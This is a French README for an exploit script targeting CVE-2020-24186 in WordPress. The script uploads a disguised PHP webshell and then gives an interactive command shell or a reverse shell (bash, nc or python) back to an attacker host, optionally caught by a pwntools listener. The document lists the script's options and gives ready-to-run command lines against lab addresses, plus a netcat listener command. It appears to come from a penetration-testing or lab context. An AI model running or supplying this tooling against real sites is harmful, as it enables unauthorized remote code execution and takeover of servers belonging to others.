
Script d'exploitation pour CVE-2020-24186 dans WordPress qui télécharge un webshell PHP camouflé et fournit un accès interactif ou un reverse shell avec automatisation facultative de l'écouteur pwntools.
Ce script exploite la vulnérabilité CVE-2020-24186 dans WordPress pour télécharger une charge utile PHP camouflée et obtenir un shell sur le système cible. Il propose trois modes de fonctionnement :
Shell interactif :
Télécharge le webshell de base et entre en mode interactif, vous permettant d'envoyer des commandes via le paramètre cmd.
Shell inverse manuel :
Télécharge le webshell et envoie la charge utile du shell inverse, mais ne lance pas automatiquement un écouteur. Vous devez démarrer manuellement votre propre écouteur sur l'IP et le port spécifiés.
Shell inverse avec pwntools :
Télécharge le webshell, envoie la charge utile du shell inverse, et le script lance automatiquement un écouteur à l'aide de pwntools pour capturer la connexion inverse.
requestspwn (pwntools)--url : URL de base du site cible (par ex., http://10.10.110.119).--blogpath : Chemin vers l'article (défaut : /?page=1).--mode : Mode de fonctionnement, soit interactive soit reverse.--lhost : IP locale pour le shell inverse (requis en mode reverse).--lport : Port local pour le shell inverse (requis en mode reverse).--reverse_method : Méthode de shell inverse : bash, nc ou python (défaut : bash).--manual : Lorsqu'il est utilisé en mode inverse, le script ne lancera pas l'écouteur ; vous devez démarrer votre propre écouteur manuellement.--use-proxy : Si défini, les requêtes seront envoyées via le proxy configuré.Télécharge un webshell et démarre une session interactive pour envoyer des commandes :
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode interactive --use-proxy
Télécharge le webshell, envoie la charge utile du shell inverse, mais ne démarre pas automatiquement un écouteur. Démarrez votre propre écouteur manuellement (par ex., avec netcat) :
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --manual --use-proxy
Ensuite, dans un autre terminal, démarrez votre écouteur manuellement :
nc -lvnp 9002
Télécharge le webshell, envoie la charge utile du shell inverse, et le script lance automatiquement un écouteur avec pwntools pour capturer la connexion :
python3 CVE-2020-24186.py --url http://10.10.110.119 --blogpath "/?page=1" --mode reverse --lhost 10.10.1.1 --lport 9002 --reverse_method bash --use-proxy
Le script attendra une connexion sur 10.10.1.1:9002 et, une fois connecté, fournira un shell interactif.
--php_payload si des ajustements sont nécessaires.--use-proxy.